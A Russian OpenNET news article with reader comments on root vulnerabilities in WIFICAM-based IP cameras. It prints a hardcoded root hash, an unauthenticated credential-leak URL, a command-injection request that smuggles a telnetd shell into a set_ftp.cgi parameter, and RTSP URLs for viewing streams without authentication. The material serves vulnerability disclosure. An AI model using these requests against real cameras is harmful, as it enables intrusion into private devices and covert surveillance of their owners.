The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

11.03.2017 11:26  Более тысячи моделей IP-камер подвержены root-уязвимости

В результате изучения прошивки камеры Wireless IP Camera (P2P) WIFICAM была выявлена возможность удалённого доступа к устройству с правами root, используя жестко прописанный в прошивке пароль. Более детальный разбор показал, что в прошивке также присутствуют и другие уязвимости, позволяющие выполнить свой код с правами root, в том числе обнаружена уязвимость в http-сервере GoAhead, который используется многими другими производителями IP-камер.

Так как камера Wireless IP Camera (P2P) WIFICAM построена на типовой платформе, на основе которой выпускаются многие другие модели IP-камер, некоторые уязвимости проявляются и в моделях других производителей. В сумме проблемам оказались подвержены около 1250 различных моделей камер. Сканирование сети через севис Shodan выявило более 185 тысяч уязвимых устройств. Миллионы камер во внутренних подсетях потенциально уязвимы для атак через облачную инфраструктуру.

Среди уязвимых отмечены некоторых модели камер 3com, 7Links, A4Tech, APKLINK, AQUILA, AVACOM, Acromedia, Agasio, Airsight, Alecto, Allnet, Apexis, Atheros, Bionics, Chinavasion, D-Link, Dericam, EST, EasyCam, EasyN, Elro, EyeCam, Foscam, GoAhead, Heden, iView ,ICam, Kogan, LifeTech, Logitech, Maginon, Mediatech, Netcam, Pixpo, Polariod, Provision, Pyle, Scricam, skylink, Skytronic, SmartEye, Sricam, Sricctv, StarCam, Sumpple, Suneyes, Supra+Space, Swann, Techview, Tenvis, Vantech, Vstarcam, Wanscam, Wansview, X10 и т.д.

Выявленные уязвимости:

  • В прошивке определён фиксированный пароль root ("root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh") и по умолчанию запущен сервис "telnetd". Для входа с правами root достаточно подобрать пароль по хэшу и подключиться при помощи telnet;
  • В прошивке сохранён закрытый RSA-ключ для Apple Production iOS Push Services (/system/www/pem/ck.pem);
  • Утечка информации в http-сервере GoAhead, позволяющая получить информацию об учётных записях. Параметры доступа сохраняются в файлах system.ini и system-b.ini, на которые присутствуют символические ссылки из директории для отдачи данных в Web. Из-за ошибки, в отличии от cgi-скриптов, требующих аутентификации, к файлам можно обратиться без аутентификации, указав пустые логин и пароль. Например, для получения параметров входа достаточно запросить файл "http://192.168.1.1/system.ini?loginuse&loginpas";
  • Через манипуляции со скриптом set_ftp.cgi, предназначенным для настройки доступа по FTP, можно выполнить произвольную команду с правами root через подстановку shell-конструкции "$(...)". Например, для запуска процесса telnetd для входа без пароля можно выполнить:
    
       $ wget -qO- 'http://192.168.1.1/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
    
       $ wget -qO- 'http://192.168.1.1/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'
    
       $ telnet 192.168.1.107 25
       Trying 192.168.1.107...
       Connected to 192.168.1.107.
       Escape character is '^]'.
    
       / # id
       uid=0(root) gid=0
    
    

    Комбинируя данную уязвимость с утечкой параметров аутентификации, можно обеспечить удалённый вход на камеру с правами root. Для упрощения проведения атаки и организации обратного канала связи для обхода межсетевого экрана подготовлен универсальный эксплоит.

  • Возможность просмотра передаваемых камерой видеоматериалов без аутентификации. Для просмотра достаточно обратиться к TCP-порту 10554 по протоколу RTSP, например "vlc rstp://192.168.1.1:10554/tcp/av0_1" или "vlc rstp://192.168.1.1:10554/tcp/av0_0";
  • По умолчанию камера обеспечивает работу с облачными сервисами, что позволяет использовать мобильные приложения для управления камерой, размещённой за транслятором адресов или межсетевым экраном. По умолчанию камера периодически отправляет UDP-пакеты к сервисам www.baidu.com, openapi.xg.qq.com и ряду жестко прошитых IP-адресов. Протокол взаимодействия с облачными сервисами достаточно простой и не использует шифрование. В качестве идентификатора для подключения к камере через облачную сеть используется серийный номер, что позволяет зная или подобрав серийный номер, подключиться к камере во внутренней подсети, к которой нет прямого доступа из интернет.

Дополнительно можно отметить выявленную другими исследователями уязвимость в CCTV и IP-камерах компании Dahua Techology. Уязвимость позволяет внешнему неаутентифицируемому атакующему загрузить содержимое базы с именами и паролями пользователей устройства, в том числе учётной записью администратора. Атака сводится к загрузке файла с учётными записями и входу на устройство с полученными параметрами администратора. Рабочий эксплоит планируется опубликовать 5 апреля, дав пользователям время на установку обновления.

  1. Главная ссылка к новости (https://pierrekim.github.io/bl...)
  2. OpenNews: Выявлен метод получения root-доступа на цифровую камеру Samsung NX-300, основанную на Tizen
  3. OpenNews: Зафиксирована атака с подстановкой бэкдора в маршрутизаторы Cisco
  4. OpenNews: Волна атак на клиентские маршрутизаторы
  5. OpenNews: Легко эксплуатируемая критическая уязвимость в маршрутизаторах Netgear
  6. OpenNews: В маршрутизаторах Netgear выявлена уязвимость, позволяющая узнать пароль входа
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: ipcamera, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Показать все | RSS
 
  • 1.1, Аноним, 20:57, 11/03/2017 [ответить] [смотреть все]    [к модератору]
  • +5 +/
    Богата земля китайская дырявыми устройствами
     
     
  • 2.6, Аноним, 22:12, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]
  • +6 +/
    Да это вполне ожидаемо, если учесть, что так называемые эмбеддеры, разрабатывающие данные устройства, сидят под вантузом, запуская gcc.exe и ld.so.exe. Отсутствие личной гигиены - одна из основных проблем.
     
     
  • 3.7, Аноним, 22:34, 11/03/2017 [^] [ответить] [смотреть все]     [к модератору]
  • –3 +/
    может по тому что ленятся модифицировать референс код Да и дорого это для ус... весь текст скрыт [показать]
     
     
  • 4.24, Аноним, 10:48, 12/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Лучше бы они этого не делали, ибо см. выше.
     
  • 3.38, Аноним, 20:18, 12/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    > ld.so.exe

    o_O

     
     
  • 4.44, нежданчик, 04:58, 13/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    ГЫ-ксперт в наличии =)
     
  • 2.46, Sen, 11:03, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –1 +/
    А россейская вечно недовольными коментаторами-бездельниками...
     
  • 1.2, Аноним, 20:59, 11/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    А почему д этого комментарии не отправлялись?
     
     
  • 2.5, Аноним, 22:09, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +1 +/
    Наверное боялись, что работники гетиша dahua сольют o dahua.
     
  • 1.3, Аноним, 21:28, 11/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +21 +/
    > Dahua Techology
    > DahuaSecurity.com

    Даже добавить нечего.

     
     
  • 2.18, Аноним, 01:40, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    >http-сервере GoAhead
    >GoAhead
    >уязвимость
     
  • 1.8, DeerFriend, 22:54, 11/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    А есть для таких камер аналоги опенврт?
     
     
  • 2.28, AlexYeCu, 13:56, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –1 +/
    Raspberry или другой SoC хоть родная камера, хоть вебка В принципе, что-то мо... весь текст скрыт [показать] [показать ветку]
     
  • 2.40, Michael Shigorin, 21:02, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Хозяйке на заметку https packages altlinux org vargus чтоб хоть это не изобр... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.68, DeerFriend, 21:19, 14/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Я не понимать, как этот vargus можно установить на видеокамеру Вопрос был о про... весь текст скрыт [показать]
     
     
  • 4.69, Michael Shigorin, 21:24, 14/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > Вопрос был о прошивке для камер

    Не, это не прошивка...

     
  • 1.9, Sabakwaka, 23:12, 11/03/2017 [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Удаленный вход по 192.168.х.х?

    Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!

     
     
  • 2.10, XoRe, 23:49, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +4 +/
    Вы даже не представляете, сколько их ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.23, user, 05:16, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Смерть приватности как камеры слежения становятся игрушкой хакеров http www b... весь текст скрыт [показать]
     
  • 2.11, Анон_, 23:51, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +3 +/
    убьешься ты, наоборот, городить защищенную сеть для своих ip-камер В случае, ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.15, Sabakwaka, 00:52, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +3 +/
    171 Сеть для своих камер 187 , простите, должна быть локальной и приезжать ви... весь текст скрыт [показать]
     
     
  • 4.19, Crazy Alex, 02:09, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • –5 +/
    Затем, что это может быть куча расположенных в различных местах городах странах ... весь текст скрыт [показать]
     
     
  • 5.27, YetAnotherOnanym, 13:46, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +4 +/
    Например, затем, чтобы злоумышленник, планирующий ограбление склада, не мог пров... весь текст скрыт [показать]
     
     
  • 6.43, Crazy Alex, 01:14, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Оценивать надо Подозреваю, что оно того не окупит По нынешним временам злоум... весь текст скрыт [показать]
     
  • 4.22, _, 04:08, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    192 168 0 0 16 Ыгсперт Д,Б - ... весь текст скрыт [показать]
     
     
  • 5.29, Sabakwaka, 14:40, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    24, кловун, 24 ... весь текст скрыт [показать]
     
  • 5.41, Michael Shigorin, 21:02, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Зачем вся 16-то ... весь текст скрыт [показать]
     
     
  • 6.45, тигар, 09:09, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    потому что CIDR 192 168 24 немножко invalid думаю, что именно на это намекали ... весь текст скрыт [показать]
     
     
  • 7.47, Michael Shigorin, 12:02, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Я прочёл как any практически на автомате ... весь текст скрыт [показать]
     
  • 4.62, Анон_, 20:30, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    кому должна - админу локалхоста Целых две камеры, одна в домофоне, вторая в сор... весь текст скрыт [показать]
     
  • 2.34, Аноним, 17:53, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Дело в том, что они не в курсе про то что они в интернете видны Проблема в скрв... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.37, Sabakwaka, 18:34, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    И кто же дарит им услуги DNS Где это место Дайте два ... весь текст скрыт [показать]
     
  • 2.48, Аноним, 12:44, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Они сильно умные облачные теперь, и могут нетривиальными способами к нему коннек... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.49, Аноним, 12:45, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    вплоть до коннекта к ней через wifi соседа ... весь текст скрыт [показать]
     
  • 3.57, Sabakwaka, 17:59, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Хто платит за DNS Почему мне не бесплатно, а им нахаляву ... весь текст скрыт [показать]
     
     
  • 4.63, Анон_, 20:33, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    потому что ты поленился погуглить дальше первых двух строчек, а там уже действит... весь текст скрыт [показать]
     
     ....нить скрыта, показать (19)

  • 1.12, incker, 00:10, 12/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +/
    А я не так давно ржал, что последнем в фильме Форсаж хакают камеры.
    Еще от части напомнило игру watch dogs (кажется так называется)
     
  • 1.13, Аноним, 00:13, 12/03/2017 [ответить] [смотреть все]     [к модератору]  
  • +/
    как правило установщики этих камер по всей нашей стране, люди неквалифицированны... весь текст скрыт [показать]
     
  • 1.14, Ilya Indigo, 00:19, 12/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Я в шоке от кол-ва зондов одновременно, на любой вкус у такого внушительного кол-ва производителей.
     
     
  • 2.16, Sabakwaka, 00:56, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –3 +/
    Никто не предполагает, что существуют мурзилы, прокидывающие камеры в Интернет ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.39, Аноним, 20:26, 12/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Если бы даже это было и так а это не так, см документацию любой IP-камеры , чт... весь текст скрыт [показать]
     
     
  • 4.59, Аноним, 18:50, 13/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Сэр, это старая традиция подоконников!
     
  • 3.51, tonys, 13:06, 13/03/2017 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Неправда Все производители камер видеонаблюдения как раз и расхваливают фичу уд... весь текст скрыт [показать]
     
  • 1.17, Аноним, 01:18, 12/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +/
    rtsp может всё таки в VLC открывать?
    (real time streaming protocol)
     
     
  • 2.35, Аноним, 17:55, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Не тут как выяснилось RTSP не мапит локальный сервис UPnP так что только HTTP ... весь текст скрыт [показать] [показать ветку]
     
  • 1.20, Черный Властелин, 03:29, 12/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +2 +/
    IoT во все поля
     
     
  • 2.32, Аноним, 16:24, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +1 +/
    > IoT во все поля

    Пока что просто демка.


     
  • 1.21, Аноним, 03:44, 12/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +/
    можно подсматривать как набирают пароли в танчики
     
  • 1.25, бедный буратино, 13:04, 12/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +/
    а где сам пароль?
    а где ссылки на интересные стримы?
     
     
  • 2.30, Антон, 14:51, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –1 +/
    на дваче
     
     
  • 3.42, Аноним, 21:10, 12/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +3 +/
    > Server not found
    > Firefox can't find the server at 2ch.ru.
     
     
  • 4.58, Аноним, 18:34, 13/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Goodnight, sweet prince.
     
  • 3.60, Аноним, 18:51, 13/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    НСБ!
     
  • 1.26, Аноним, 13:11, 12/03/2017 [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    Сколько-сколько А почему в DNS_е через дорогу не продают ни одной Посоветуйте ... весь текст скрыт [показать]
     
     
  • 2.31, name, 15:49, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Только у них через интернет https play google com store apps details id smile ... весь текст скрыт [показать] [показать ветку]
     
  • 2.33, AlexYeCu, 17:31, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    Экий ты затейник Пожалуй, послежу за веткой 8212 вдруг кто чего дельного при... весь текст скрыт [показать] [показать ветку]
     
  • 2.36, Аноним, 17:57, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +2 +/
    вы ТЗ не туда отправили надо в китай слать там все бракоделы ... весь текст скрыт [показать] [показать ветку]
     
  • 1.54, Аномномномнимус, 13:47, 13/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +/
    А подсоветуйте какой софт к этим "широко распространённым" камерам, чтобы можно было ими вертеть, ночной/дневной режим переключать и микрофон юзать? А то у них либо надо ставить какой-то шлак для IE (что уже абсурдно), либо ставить прилагу из плеймаркета гуглового на смартфон. В остальных вариантах оный функционал не работает
     
     
  • 2.61, Uopwd, 19:14, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –2 +/
    шлак под IE работает как надо, и микрофон и динамики, и практически всё остально... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.66, Аномномномнимус, 23:27, 13/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Нет. Нормально, из того что опробовано, работает только андроидное приложение.
     
  • 2.70, Андрей, 23:24, 14/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    У beward'a вроде есть подобные приложения
     
  • 1.72, Аноним, 13:28, 20/03/2017 [ответить] [смотреть все]    [к модератору]  
  • +/
    Как эксплоит-то запустить, Бэтмэны ?
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor